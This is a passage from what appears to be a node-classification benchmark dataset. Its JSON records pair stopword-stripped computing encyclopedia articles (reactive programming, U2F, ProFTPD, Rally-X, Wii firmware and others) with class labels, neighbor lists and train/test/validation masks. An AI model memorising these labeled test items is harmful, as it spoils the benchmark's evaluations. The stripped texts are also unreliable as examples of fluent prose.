smooth remains open problem cases possible principled partial solutions two solutions include reactive languages graph dependencies static i.e. graph fixed throughout program execution languages graph dynamic i.e. change program executes simple example consider illustrative example codice_1 reactive value every second value expression changes different reactive expression codice_14 depends therefore graph dependencies updates every second permitting dynamic updating dependencies provides significant expressive power instance dynamic dependencies routinely occur graphical user interface gui programs however reactive update engine must decide whether reconstruct expressions time keep expression node constructed inactive latter case ensure participate computation supposed active reactive programming languages range explicit ones data flows set using arrows implicit data flows derived language constructs look similar imperative functional programming example implicitly lifted functional reactive programming frp function call might implicitly cause node data flow graph constructed reactive programming libraries dynamic languages lisp cells python trellis libraries construct dependency graph runtime analysis values read function execution allowing data flow specifications implicit dynamic sometimes term reactive programming refers architectural level software engineering individual nodes data flow graph ordinary programs communicate reactive programming purely static data flows set statically dynamic data flows change execution program use data switches data flow graph could extent make static data flow graph appear dynamic blur distinction slightly true dynamic reactive programming however could use imperative programming reconstruct data flow graph reactive programming could said higher order supports idea data flows could used construct data flows resulting value data flow another data flow graph executed using evaluation model first ideally data changes propagated instantly assured practice instead might necessary give different parts data flow graph different evaluation priorities called differentiated reactive programming example word processor marking spelling errors need totally sync inserting characters differentiated reactive programming could potentially used give spell checker lower priority allowing delayed keeping data-flows instantaneous however differentiation introduces additional design complexity example deciding define different data flow areas handle event passing different data flow areas evaluation reactive programs necessarily based stack based programming languages evaluated instead data changed change propagated data derived partially completely data changed change propagation could achieved number ways perhaps natural way invalidate/lazy-revalidate scheme could problematic simply naively propagate change using stack potential exponential update complexity data structure certain shape one shape described repeated diamonds shape following structure a→b→a a→c→a n=1,2 ... problem could overcome propagating invalidation data already invalidated later re-validate data needed using lazy evaluation one inherent problem reactive programming computations would evaluated forgotten normal programming language needs represented memory data-structures could potentially make reactive programming highly memory consuming however research called lowering could potentially overcome problem side reactive programming form could described explicit parallelism could therefore beneficial utilizing power parallel hardware reactive programming principal similarities observer pattern commonly used object-oriented programming however integrating data flow concepts programming language would make easier express could therefore increase granularity data flow graph example observer pattern commonly describes data-flows whole objects/classes whereas object-oriented reactive programming could target members objects/classes stack-based evaluation model common object orientation also entirely suitable data-flow propagation occurrences tree feedback edges data structures could make program face exponential complexities relatively limited use low granularity rarely problem observer pattern practice possible fuse reactive programming ordinary imperative programming paradigm imperative programs operate upon reactive data structures set-up analogous constraint imperative programming however constraint imperative programming manages bidirectional constraints reactive imperative programming manages one-way dataflow constraints object-oriented reactive programming oorp combination object oriented programming reactive programming perhaps natural way make combination follows instead methods fields objects reactions automatically re-evaluate reactions depend modified illustration codice_15 introductory example using javascript jquery function seta // a=x+y integers seta // initial value x .css 'cursor 'pointer .click function oorp programming language maintains imperative methods would also fall category imperative reactive programming functional reactive programming frp programming paradigm reactive programming functional programming relatively new category programming languages uses constraints rules main programming concept consists reactions events keep constraints satisfied facilitate event-based reactions makes reactive programs instrumental correctness software example rule based reactive programming language ampersand founded relation algebra modern spreadsheet often cited example reactive programming problematic unqualified term spreadsheet may refer either confusion arises spreadsheet application 2 example reactive program program effectively defined underlying spreadsheet 1 typically reactive program semantically underlying spreadsheet 1 simply determines calculation set input cells set output cells thus could directly translated simple transformational calculation i.e function traditional programming language",
    "neighbors": [
      9345,
      3462,
      6536,
      9224,
      6795,
      6182,
      9385,
      7851,
      10667,
      8116,
      1591,
      2106,
      10042,
      4417,
      10819,
      9926,
      3529,
      2901,
      3159,
      5081,
      7262,
      4578,
      228,
      8430,
      11125,
      2680,
      3705,
      508
    ],
    "mask": "Train"
  },
  {
    "node_id": 1052,
    "label": 4,
    "text": "Quick_Heal:quick heal quick heal technologies ltd security solutions provider headquartered pune india company formerly known cat computer services p ltd started computer service center 1995 company renamed quick heal technologies pvt ltd. 2007 company develops security software consumers servers cloud computing environments small medium enterprises sells products directly customers partner channel enterprise product offerings operate brand name seqrite companies products regularly tested features abilities compared similar products quick heal develops security suite quick heal total security uses bitdefender scanning engine quick heal founded 1995 cat computer services p ltd renamed 2007 quick heal technologies ltd listed bse nse 2010 quick heal received investment ₹ 60 crores sequoia capital new branch offices opened madurai tamil nadu 2012 offices opened japan us 2013 offices opened africa uae 2016 quick heal technologies acquired security firm junco technologies launch seqrite services 2016 quick heal technologies launched ipo valued company market value inr 1,500 crores",
    "neighbors": [
      4480,
      2049,
      7809,
      131,
      5891,
      1417,
      3981,
      10637,
      4374,
      156,
      6431,
      2721,
      5924,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      6699,
      8615,
      6834,
      4403,
      9523,
      3382,
      10166,
      7103,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      1994,
      5069,
      10574,
      10708,
      2005,
      8024,
      11225,
      1242,
      2907,
      8668,
      2654,
      9055,
      9569,
      11622,
      6382,
      4464,
      9713,
      4722,
      3955,
      6643,
      10872,
      9341,
      2558,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 1053,
    "label": 3,
    "text": "Extended_MMX:extended mmx extended mmx refers one two possible extensions mmx instruction set x86 included intel streaming simd extensions number new instructions extended functionality mmx amd incorporated subset extended mmx instructions athlon microarchitecture instructions commonly known extended mmx instructions instructions debuted may 1999 intel pentium iii processor part sse instruction set next month late june 1999 amd athlon processor released featured extended mmx instructions sse today extended mmx instructions notable common subset mmx extensions work across amd athlon sse-capable intel processors less commonly known extended mmx could also refer original cyrix emmi extended multi-media instructions instruction set developed cyrix implemented 6x86 mx mii line processors extended mmx instruction set 12 new instructions useful multimedia applications extensions enabled default requiring bios software enable emmi never given much support software developers acknowledged cyrix competitors certain intel sse instructions even share opcodes emmi instructions never implemented processors mii emmi instruction set included",
    "neighbors": [
      1005,
      499,
      1915,
      8125,
      8126
    ],
    "mask": "Test"
  },
  {
    "node_id": 1054,
    "label": 5,
    "text": "Universal_2nd_Factor:universal 2nd factor universal 2nd factor u2f open standard strengthens simplifies two-factor authentication 2fa using specialized universal serial bus usb near-field communication nfc devices based similar security technology found smart cards initially developed google yubico contribution nxp semiconductors standard hosted fido alliance usb devices communicate host computer using human interface device hid protocol essentially mimicking keyboard avoids need user install special hardware driver software host computer permits application software browser directly access security features device without user effort possessing inserting device communication established application exercises challenge–response authentication device using public-key cryptography methods secret unique device key manufactured device device key secured duplication degree social trust commercial manufacturer logically secured reverse-engineering counterfeiting robustness encryption physical possession u2f security keys supported google chrome since version 38 opera since version 40 u2f security keys used additional method two-step verification online services support u2f protocol including google dropbox github gitlab bitbucket nextcloud facebook others chrome firefox opera browsers supporting u2f natively microsoft enabled fido 2.0 support windows 10 windows hello login platform microsoft edge browser gained support u2f october 2018 windows update microsoft accounts including office 365 onedrive microsoft services yet u2f support mozilla integrated firefox 57 enabled default firefox 60 thunderbird 60 microsoft edge starting build 17723 support fido2 u2f standard undergone two major revisions additional specification documents may obtained fido web site u2f 1.0 proposed standard october 9 2014 starting point short-lived specification known fido 2.0 proposed standard september 4 2015 latter formally submitted world wide web consortium w3c november 12 2015 subsequently first working draft w3c web authentication webauthn standard published may 31 2016 webauthn standard revised numerous times since becoming w3c recommendation march 4 2019 meanwhile u2f 1.2 proposed standard april 11 2017 became starting point client authenticator protocol ctap proposed standard published september 27 2017 fido ctap complements w3c webauthn scope fido2 project webauthn ctap provide complete replacement u2f renamed ctap1 latest version fido2 standard webauthn protocol backwards-compatible via appid extension u2f-only security keys u2f protocol compatible webauthn-only authenticator authenticators support u2f webauthn webauthn clients support keys created via legacy u2f api",
    "neighbors": [
      8584,
      4623,
      9745,
      1945,
      11418,
      5918,
      6316,
      7212,
      10801,
      6975,
      10566,
      3271,
      11221,
      5078,
      8674,
      4326,
      362,
      9336,
      124
    ],
    "mask": "None"
  },
  {
    "node_id": 1055,
    "label": 2,
    "text": "Microsoft_Enterprise_Library:microsoft enterprise library microsoft enterprise library set tools programming libraries microsoft .net framework provides apis facilitate proven practices core areas programming including data access logging exception handling others enterprise library provided pluggable binaries source code freely used customized developers purposes also ships test cases quickstarts application block addresses specific cross-cutting concern provides highly configurable features results higher developer productivity application blocks enterprise library designed agnostic possible application architecture example logging application block may used equally web smart client service-oriented application patterns practices team produces number deliverables leverage enterprise library application blocks include web service software factory smart client software factory addition application blocks standard microsoft distribution enterprise library includes several versions microsoft enterprise library microsoft enterprise library 6 released april 2013 public announcements s.somasegar senior vp developer division grigori melnik enterprise library producer available new features include release also retired following 3 blocks details see release notes change log microsoft enterprise library 5.0 released april 2010 public announcement grigori melnik enterprise library producer available new features include note existing public apis v4.1 mostly supported list breaking changes see note several features demoed video note full change log see note optional update released may 2011 contains fixes unity interception file configuration source update required using silverlight integration pack need wcf ria services integration configuration tool support available via nuget http //www.microsoft.com/download/en/details.aspx id=6836 port microsoft enterprise library 5.0 silverlight includes following blocks public announcement http //blogs.msdn.com/b/agile/archive/2011/05/11/silverlight-integration-pack-for-microsoft-enterprise-library-5-0-released.aspx available individual blocks via nuget single download release enterprise library october 2008 service releases includes following application block software factory strong naming guidance package included release available separate download thus longer dependency guidance automation extensions gax detailed list changes see release enterprise library release enterprise library may 2008 includes following may 2007 enterprise library 3.1 released minor enhancements validation policy injection application blocks april 2007 enterprise library 3.0 released contains new application blocks new application block software factory designed simplify development new application blocks extensions new features providing better integration .net framework 3.0 3.0 release enterprise library contains following application blocks january 2006 new version enterprise library released targeted .net framework 2.0 significant change release configuration application block removed blocks updated use .net improved system.configuration capabilities release also included significant improvements logging application block much security application block removed due similar capabilities provided .net framework 2.0 .net 2.0 release enterprise library contained following application blocks two releases enterprise library released .net framework 1.1 first released january 2005 followed minor maintenance release june 2005 .net 1.1 releases enterprise library contained following application blocks ron jacobs microsoft evangelist described purpose enterprise library filling gaps .net development releases framework framework continues advance developers demanding productive development libraries time microsoft platforms evolve certain scenarios initially addressed enterprise library supported platforms case patterns practices team uses graceful retirement process deprecate parts explained microsoft continues promote enterprise library enterprise/line-of-business development even many microsoft products well projects within microsoft use extensively starting november 2013 microsoft fully opensourced enterprise library application blocks accept community contributions latest releases slab1.1 unity3.5 developed close collaboration community august 2015 microsoft posted handing unity dependency injection new owners pablo cibraro pedro wood new github repo time patterns practices enterprise library home web site codeplex announced remainder application blocks longer developed however source continue available",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      603,
      2145,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      3224,
      4771,
      7846,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      7983,
      11570,
      5952,
      1348,
      844,
      10079,
      11616,
      2401,
      2943,
      9609,
      9612,
      9114,
      10654,
      8607,
      11683,
      6584,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1056,
    "label": 4,
    "text": "Solving_the_E-waste_Problem:solving e-waste problem solving e-waste problem step international initiative created develop solutions address issues associated waste electrical electronic equipment weee eminent players fields production reuse recycling electrical electronic equipment eee government agencies ngos well un organisations count among members step encourages collaboration stakeholders connected e-waste emphasising holistic scientific yet applicable approach problem waste electrical electronic equipment weee increasing every day volume weee becoming serious environmental problem yet become recognised greater public guarantee neutrality required give analysis recommendations necessary credibility step started starting period three years initiated united nations university unu promotion team wetzlar hewlett-packard step initiative official launch march 2007 “ one important aims step initiative elaborate set global guidelines treatment e-waste promotion sustainable material recycling ” press communiqué initiative initiative comprises five cooperating task forces addressing specific aspects e-waste covering entire life-cycle electric electronic equipment activities initiative places emphasis working policy-making bodies allow results research impact current practices step coordinated science research body un system united nations university unu long-term goal step “ develop – based scientific analysis – globally accepted standard refurbishment recycling e-waste herewith step ’ aim reduce dangers humans environment result inadequate irresponsible treatment practices advance resource efficiency. ” ruediger kuehr executive secretary step initiative achieve step conceives implements projects based results multidisciplinary dialogues projects seek develop sustainable solutions reduce environmental risk enhance development supreme body step initiative general assembly decides general direction development general assembly based memorandum understanding signed members states guiding principles step secretariat hosted unu bonn mandated accomplishment day-to-day managerial work initiative steering committee composed representatives key stakeholders monitors progress initiative core work accomplished five task forces tf “ policy ” “ redesign ” “ reuse ” “ recycle ” “ capacity building ” task forces conduct research analysis respective domains seek implement innovative projects tf 1 – policy aim task force assess analyse current governmental approaches regulations related weee starting analysis recommendations future regulating activities shall formulated tf2 – redesign task force works design eee focusing reduction negative consequences electrical electronic appliances throughout entire life cycle task force especially takes heed situation developing countries tf3 – reuse focus task force lies development sustainable transmissible principles standards reuse eee tf4 – recycle objective task force improve infrastructures systems technologies realize sustainable recycling global level tf5 – capacity building aim task force draw attention problems connected weee aim shall achieved making results research task forces stakeholders publicly available task force relies personal networks internet collaborative working tools etc guiding principles 1 step ’ work founded scientific assessments incorporates comprehensive view social environmental economic aspects e-waste 2 step conducts research entire life-cycle electronic electrical equipment corresponding global supply process material flows 3 step ’ research pilot projects meant contribute solution e-waste problems 4 step condemns illegal activities related e-waste including illegal shipments reuse/ recycling practices harmful environment human health 5 step seeks foster safe eco/energy-efficient reuse recycling practices around globe socially responsible manner quote website",
    "neighbors": [
      5384,
      9499,
      7579
    ],
    "mask": "Test"
  },
  {
    "node_id": 1057,
    "label": 3,
    "text": "Apple_A11:apple a11 apple a11 bionic 64-bit arm-based system chip soc designed apple inc. manufactured tsmc first appeared iphone 8 iphone 8 plus iphone x introduced september 12 2017 according apple chip two high-performance cores 25 faster apple a10 four high-efficiency cores 70 faster energy-efficient cores a10 a11 features apple-designed 64-bit armv8-a six-core cpu two high-performance cores 2.39 ghz called monsoon four energy-efficient cores called mistral monsoon cores 7-wide decode out-of-order superscalar design mistral cores 3-wide decode out-of-order superscalar design mistral cores based apple swift cores apple a6 a11 uses new second-generation performance controller permits a11 use six cores simultaneously unlike predecessor a10 a11 also integrates apple-designed three-core graphics processing unit gpu 30 faster graphics performance a10 embedded a11 m11 motion coprocessor a11 includes new image processor supports computational photography functions lighting estimation wide color capture advanced pixel processing a11 manufactured tsmc using 10 nm finfet process contains 4.3 billion transistors die 87.66 mm size 30 smaller a10 manufactured package package pop together 2 gb lpddr4x memory iphone 8 3 gb lpddr4x memory iphone 8 plus iphone x a11 also includes dedicated neural network hardware apple calls neural engine neural network hardware perform 600 billion operations per second used face id animoji machine learning tasks neural engine allows apple implement neural network machine learning energy-efficient manner using either main cpu gpu however third party apps use neural engine leading similar neural network performance older iphones bloomberg says neural engine fruit apple efforts improve ai team since 2015 report bloomberg apple secretive nature made difficult attract ai research scientists apple since recruited people multiple companies working ai published papers related ai research october 2016 apple hired russ salakhutdinov director ai research",
    "neighbors": [
      9732,
      7697,
      4114,
      9235,
      11282,
      6165,
      11289,
      7706,
      8222,
      2551,
      38,
      6183,
      1576,
      4139,
      7211,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      1090,
      7747,
      2635,
      8783,
      4180,
      10838,
      10840,
      9312,
      9826,
      99,
      8806,
      8812,
      6258,
      10357,
      10361,
      4220,
      10365,
      638,
      6783,
      10878,
      644,
      4741,
      8842,
      6283,
      7824,
      146,
      147,
      659,
      7830,
      6807,
      7833,
      666,
      5786,
      6815,
      4258,
      7842,
      7844,
      4773,
      2735,
      9913,
      4283,
      7869,
      8893,
      8383,
      8896,
      10945,
      4807,
      4810,
      1744,
      4821,
      3293,
      9952,
      2788,
      3301,
      6884,
      1772,
      9964,
      1776,
      10481,
      6391,
      3835,
      2814,
      1290,
      3338,
      781,
      6926,
      4879,
      784,
      10512,
      8480,
      10023,
      5417,
      810,
      2862,
      4399,
      4910,
      7988,
      11062,
      11066,
      6971,
      9022,
      1346,
      8003,
      10562,
      6981,
      5963,
      8525,
      1871,
      1872,
      9042,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      1377,
      11629,
      10608,
      6001,
      373,
      8058,
      9084,
      7549,
      11649,
      392,
      3977,
      6539,
      398,
      1428,
      3483,
      4508,
      10658,
      2979,
      5028,
      7077,
      9638,
      8109,
      3511,
      2492,
      446,
      7614,
      5058,
      9155,
      10691,
      2502,
      456,
      1482,
      9163,
      7631,
      464,
      6608,
      980,
      9685,
      8662,
      9174,
      10199,
      8665,
      2524,
      9182,
      2023,
      10734,
      5616,
      6130,
      1014,
      3575,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 1058,
    "label": 3,
    "text": "Programmable_interrupt_controller:programmable interrupt controller computing programmable interrupt controller pic device used combine several sources interrupt onto one cpu lines allowing priority levels assigned interrupt outputs device multiple interrupt outputs assert asserts order relative priority common modes pic include hard priorities rotating priorities cascading priorities pics often allow cascading outputs inputs pics typically common set registers interrupt request register irr in-service register isr interrupt mask register imr irr specifies interrupts pending acknowledgement typically symbolic register directly accessed isr register specifies interrupts acknowledged still waiting end interrupt eoi imr specifies interrupts ignored acknowledged simple register schema allows two distinct interrupt requests outstanding one time one waiting acknowledgement one waiting eoi number common priority schemas pics including hard priorities specific priorities rotating priorities interrupts may either edge triggered level triggered number common ways acknowledging interrupt completed eoi issued include specifying interrupt completed using implied interrupt completed usually highest priority pending isr treating interrupt acknowledgement eoi one best known pics 8259a included x86 pc modern times included separate chip x86 pc rather part motherboard southbridge chipset cases replaced newer advanced programmable interrupt controllers support interrupt outputs flexible priority schemas information intel apic found ia-32 intel architecture software developer manual volume 3a system programming guide part 1 chapter 10 freely available intel website",
    "neighbors": [
      9861,
      10183,
      3272,
      1515,
      5457,
      7445,
      6806,
      3255,
      1176,
      5529,
      8090,
      1660,
      3294,
      5823
    ],
    "mask": "None"
  },
  {
    "node_id": 1059,
    "label": 4,
    "text": "F._Lynn_McNulty:f. lynn mcnulty lt. col. frederick “ f. ” lynn mcnulty 1939–2012 first director information systems security u.s. state department pioneer field cybersecurity characterized “ father ” u.s. federal information security peers eulogized tireless advocate security nation early persistent champion information security government mcnulty played key role influencing u.s. national security policy everything export controls commercial encryption products deployment key federal cybersecurity infrastructure repeatedly called testify cybersecurity matters u.s. house senate subcommittees according scmagazine.com ’ robert bigman mcnulty ’ contributions cybersecurity “ woven dna almost every government information security policy program ” security initiatives became model within federal government served basis computer security act 1987 june 15 2012 edition federal computer weekly identified mcnulty one key thought leaders field cybersecurity preceding quarter century fellow international information systems security consortium isc ² mcnulty recipient federal 100 award inducted information systems security association issa hall fame publications include f. lynn mcnulty “ encryption importance economic infrastructure security ” 9 duke journal comparative international law 427–450 1999 born alameda california mcnulty received b.a international affairs university california berkeley awarded 2 master degrees m.a international affairs san jose state m.p.a george washington university united states army reserve officer 1963 1999 frederick lynn mcnulty activated four years vietnam war late 1960s early 1970s mcnulty worked information security central intelligence agency retired government 1995 mcnulty died aggressive lymphoma 2012 buried arlington national cemetery late 2013 isc ² created mcnulty award one u.s. government information security leadership awards gisla f. lynn mcnulty honor f. lynn mcnulty tribute gisla recognize member u.s. federal information security community upholds mcnulty ’ legacy visionary innovator outstanding service commitment organization shall bestow first f. lynn mcnulty gisla october 2013 2014 f. lynn mcnulty posthumously awarded lifetime achievement award 17th annual bestowing awards excellence information security public policy rsa global information security conference san francisco california widow peggy mcnulty accepted award",
    "neighbors": [
      7107
    ],
    "mask": "None"
  },
  {
    "node_id": 1060,
    "label": 3,
    "text": "Rally-X:rally-x rally-x one namco first video games imported outside japan due business relations midway presented amusement machine operator union america trade show north america alongside namco pac-man william defender despite rumors executives claimed rally-x would successful namco marketing team heavily promoted game test run would gain much praise pac-man despite sales lower anticipated rally-x given positive reception standing amidst games genre contemporary home port game release msx japan rally-x would followed several sequels releases namco video game collections platforms cited early hit golden age arcade games item game special flag would make appearances plethora future video games including xevious gaplus super smash bros. nintendo 3ds wii u usually item grants extra life player drives blue car around multi-directional scrolling maze car automatically moves whichever direction joystick pushed runs wall turn continue every round ten flags scattered around maze player must collect clear round move next round flags increase value collected first 100 points second 200 third 300 also special flags indicated letter — player collects one value earned flags doubles rest round player dies however next flag value set back 100 double bonus lost collecting special first flag 10 flags one run maximum points player obtain round 11000 player also obtain fuel bonus round complete varies depending much fuel remaining according fuel gauge several red cars chase blue one around maze contact results losing life hit number cars begins three increases number throughout normal round eight first five appear bottom maze next three appear top maze however player smoke screen use red cars red car runs cloud smokescreen momentarily stunned still kill player contact amount time stunned decreases level still always cause red car chase blue car using alternate route using smokescreen uses small amount fuel using every 30 seconds almost ensure runs round finishes car limited amount fuel consumed time though normally sufficient last ten flags collected fuel runs car moves slowly smoke screen longer works quickly falls victim red cars player clear round without fuel remaining rare occurrence receive fuel bonus result also stationary rocks player must avoid rocks randomly distributed throughout maze increasing number game progresses unlike cars flags positions shown radar player careful rocks also kill player contact player careful get trapped rocks red cars happens escape third stage every fourth stage bonus stage challenging stage start player must collect flags normal way red cars maximum normal number red cars eight unable move player runs fuel red cars start moving player hits red car rock challenging stage ends player lose life player run lives game highest score day game tell 1980 battlezone defender pac-man shown alongside rally-x trade show sponsored amusement machine operators america believed rally-x would top money-earner defender went sell 60,000 units — disproving projections — cemented place video game history meanwhile pac-man went sell 350,000 worldwide arcade units became highest-grossing video game time game sequel new rally-x released 1981 offers slightly different color scheme easier gameplay special flag flashes radar fewer red cars new flag called lucky flag also added awards player bonus points amount fuel remaining collected car refueled round continues still flags remaining new rally-x manufactured greater numbers became popular least japan original game compilation arcade game namco classic collection vol 2 released 1996 includes version game enhanced graphics gameplay called rally-x arrangement multiplayer capability namco museum remix released october 23 2007 nintendo wii also features revamped version game known rally-x remix also included namco museum megamix another revamped sequel rally-x rumble released apple ios platform august 17 2011 rally-x later included namco museum volume 1 sony playstation 1995 namco museum 50th anniversary 2005 pac-man arcade party 30th anniversary compilation arcade game 2010 carbon copy game along one new rally-x also included compilation title namco classic collection vol 2 1996 rally-x included part microsoft revenge arcade jakks pacific ported rally-x namco collection tv game",
    "neighbors": [
      11522,
      9093,
      2540,
      9006,
      10287,
      1776,
      10544,
      10931,
      6452,
      5717,
      8663,
      3039
    ],
    "mask": "Test"
  },
  {
    "node_id": 1061,
    "label": 9,
    "text": "FOCAL_(Hewlett-Packard):focal hewlett-packard focal forty-one calculator language language used program hp-41 range expandable science/engineering calculators hewlett-packard calculator programming languages 1980s focal program linear list instructions instruction step roughly correspond key key combination press thus correspond user would perform computation calculator paradigm made focal programming relatively easy newcomer program maintenance could nightmare besides use goto instructions—including going program step based value data register gto ind technique known computed goto — easily led spaghetti code program steps numbered starting 1 numbering intrinsic meaning change new instructions added removed middle program special instruction lbl used create label used user invoke program program target gto unconditional go-to xeq execute instruction simple focal program note contrary many programmable calculators focal step could stored memory one byte calculator memory could hold 2233 bytes program code reported program actually reached number steps",
    "neighbors": [
      5384,
      8554,
      8910,
      8503
    ],
    "mask": "Test"
  },
  {
    "node_id": 1062,
    "label": 5,
    "text": "ProFTPD:proftpd proftpd short pro ftp daemon ftp server proftpd free open-source software compatible unix-like systems microsoft windows via cygwin along vsftpd pure-ftpd proftpd among popular ftp servers unix-like environments today compared focus e.g simplicity speed security proftpd primary design goal highly feature rich ftp server exposing large amount configuration options user proftpd includes number options available many ftp daemons configuration proftpd performed single main configuration file called /etc/proftpd/proftpd.conf due similarities configuration file apache http server intuitively understandable someone uses popular web server noticeable features proftpd comes command-line interface cli several third-party graphical user interfaces gui existing proftp users prefer cli like use combination especially comes example real-time monitoring current user actions file transmissions gui helpful superior cli existing guis proftpd selection",
    "neighbors": [
      865,
      7364,
      6797,
      6189,
      7983,
      5397,
      2878
    ],
    "mask": "None"
  },
  {
    "node_id": 1063,
    "label": 3,
    "text": "Might_and_Magic_II:_Gates_to_Another_World:might magic ii gates another world might magic ii gates another world also known might magic book two gates another world role-playing video game developed published new world computing 1988 sequel events adventurers helped corak defeat sheltem varn take gates another world located varn land cron central research observational nacelle land cron facing many problems brought encroachment sheltem adventurers must travel cron four elemental planes even time help corak stop sheltem flinging cron sun many ways might magic ii updated version original improved graphics help greatly navigation interface added several functions facilitated gameplay delay selector allowed faster slower response times spinning cursor input required features lacking might magic book one might magic book one player used six player-generated characters time total twenty-six characters could created thereafter stayed various inns across cron continue game continuity possible import characters developed first game additionally might magic 2 became first game series utilize hirelings predefined characters could extend party eight active characters hirelings controlled like regular characters required payment day pay increased level new features include two new character classes increased number spells introduction class upgrade quests twice number mini-quests also added secondary skills mountaineering necessary travelling mountainous regions linguist raising character intelligence necessary reading certain messages character could two secondary skills game introduced automap feature series activated training character cartographer skill perhaps peculiar development game numeric scope character levels could reach 255 2 -1 point could train without limit provided enough gold hit points could extended high 65535 2 -1 magic points 9999 nearly item bonus could added via enchantment bonus increased weapon damage attribute bonus dungeons dragons unlike ceiling bonuses 63 might magic 2 pitted player party one 255 monsters varying 1 hit point 64000 battles could consist 255 opponents might magic 2 remained battle-focused game many puzzles solved curiosities discovered cave sex-change device instance scattered land seemingly nonsensical colored messages eventually combines useful hints first game quests game require player solve puzzles rather look next hack slash battle time travel added though ramifications practically nil exception necessary fight final boss taverns feature humorous culinary selections various absurdities strewn ability get drunk much ale would result reduced abilities character stats increased annual circus requires collection cupie dolls play games character belong one eight classes class least one prime statistic character must equal exceed member class classes knights barbarians also special skills abilities six classes featured might magic book one secret inner sanctum available sequel knight must defeat dread knight paladin must slay frost dragon archer must stop baron wilfrey cleric reunite soul corak body sorcerer must release good evil wizards isle ancients robber addition two new classes introduced many aspects game standard rpgs time characters aging gameplay reaching old age ~75 would die randomly due natural causes spell reverses process usually fails resulting increasing character age opposed decreasing however paying visit health spa resort isle reduce character age ability travel past specifically nine different centuries although two seemed relevant main story two sidequest class-specific quests class-restricted areas forcing player split party use different combinations characters departure high fantasy flavour typical rpgs last dungeon requires pcs board spaceship solve encrypted message time limit order escape planet dragon reviewers gave game 4 5 stars 5 5 stars sega genesis version computer gaming world gave game mixed review noting several bugs 1.0 version reviewer scorpia also lamented simple plotline saying might magic ii seems swerved path boring monster mash/monty haul direction ever-more-powerful characters ever-more-powerful weapons fight ever-more-powerful monsters escalates realm ludicrous van caneghem later got revenge scorpia naming monster sequel 1991 magazine also reviewed sega genesis version stating easy play excellent graphics overemphasis combat made game workmanlike airless 1993 scorpia stated might magic ii good previous game many counts ... devoted hack slash crowd 1991 pc format placed might magic ii list 50 best computer games time",
    "neighbors": [
      10931,
      3069,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 1064,
    "label": 4,
    "text": "Comparison_of_packet_analyzers:comparison packet analyzers following tables compare general technical information several packet analyzer software utilities also known network analyzers packet sniffers please see individual products articles information basic general information software—creator/company license/price etc utilities run operating systems",
    "neighbors": [
      7426,
      6797,
      1304,
      5657,
      7961,
      2205,
      6177,
      1580,
      7983,
      823,
      10935,
      8121,
      9151,
      9665,
      842,
      461,
      10705,
      9939,
      6997,
      2006,
      7895,
      8922,
      9440,
      10343,
      9320,
      10349,
      8944,
      2292,
      4085,
      1399,
      8700,
      381
    ],
    "mask": "Test"
  },
  {
    "node_id": 1065,
    "label": 7,
    "text": "Onshape:onshape onshape computer-aided design cad software system delivered internet via software service saas model makes extensive use cloud computing compute-intensive processing rendering performed internet-based servers users able interact system via web browser ios android apps onshape allows teams collaborate single shared design way multiple writers work together editing shared document via cloud services primarily focused mechanical cad mcad used product machinery design across many industries including consumer electronics mechanical machinery medical devices 3d printing machine parts industrial equipment onshape upgrades released directly web interface software require maintenance work user founded 2012 onshape based cambridge massachusetts usa offices singapore pune india leadership team includes several engineers executives originated solidworks popular 3d cad program runs windows computers onshape ’ co-founders include two former solidworks ceos jon hirschtick john mceleney onshape venture-backed company investments firms including andreessen horowitz commonwealth capital ventures new enterprise associates nea north bridge venture partners total venture funding currently amounts 169 million",
    "neighbors": [
      4194,
      7209,
      6797,
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 1066,
    "label": 4,
    "text": "NIST_RBAC_model:nist rbac model nist rbac model standardized definition role-based access control although originally developed national institute standards technology standard adopted copyrighted distributed incits 359-2004 international committee information technology standards incits latest version incits 359-2012 managed incits committee cs1 2000 nist called unified standard rbac integrating rbac model published 1992 ferraiolo kuhn rbac framework introduced sandhu coyne feinstein youman 1996 proposal published sandhu ferraiolo kuhn presented acm 5th workshop role based access control following debate comment within rbac security communities nist made revisions proposed u.s. national standard rbac incits 2004 standard received ballot approval adopted incits 359-2004 sandhu ferraiolo kuhn later published explanation design choices model 2010 nist announced revision rbac incorporating features attribute-based access control abac",
    "neighbors": [
      210,
      8627
    ],
    "mask": "None"
  },
  {
    "node_id": 1067,
    "label": 2,
    "text": "Wii_system_software:wii system software wii system software set updatable firmware versions software frontend wii home video game console updates downloaded via system internet connection wiiconnect24 discontinued allowed nintendo add additional features software new update became available nintendo sent message connected systems notifying available update several game discs first-party third-party games included system software updates players connected internet still update system additionally force upgrade requiring player perform update without new game played online games super smash bros. brawl mario kart wii come specific extra updates able receive posts game-specific addresses regardless version installed software install update wii firmware form ioses thought wii homebrew developers stand input output systems internal operating systems run separate arm architecture processor wii software nicknamed starlet wii homebrew community physically located inside graphics chip ati hollywood small part hollywood patent wii u indicates similar device simply named input/output processor control input output code running main processor ibm powerpc broadway processor wii hardware features exist gamecube accessed via arm nintendo releases new ios version except unusual circumstances example security updates block homebrew new ios replace ios already installed instead gets installed addition current ios versions native wii software including games distributed nintendo optical discs system menu virtual console games wiiware wii channels exception certain homebrew applications ios version hardcoded software software run ios hardcoded gets loaded wii loads software ios exist wii case disc-based software gets installed automatically user prompted downloaded software theoretically happen user access shop download software unless player ios versions require however homebrew used forcefully install run piece software required ios exist user brought back system menu nintendo created system new updates would unintentionally break compatibility older games side effect uses space wii internal nand flash memory ioses referred number theoretically 0 254 although many numbers skipped presumably development versions never completed one ios version run given time time ios running wii enters 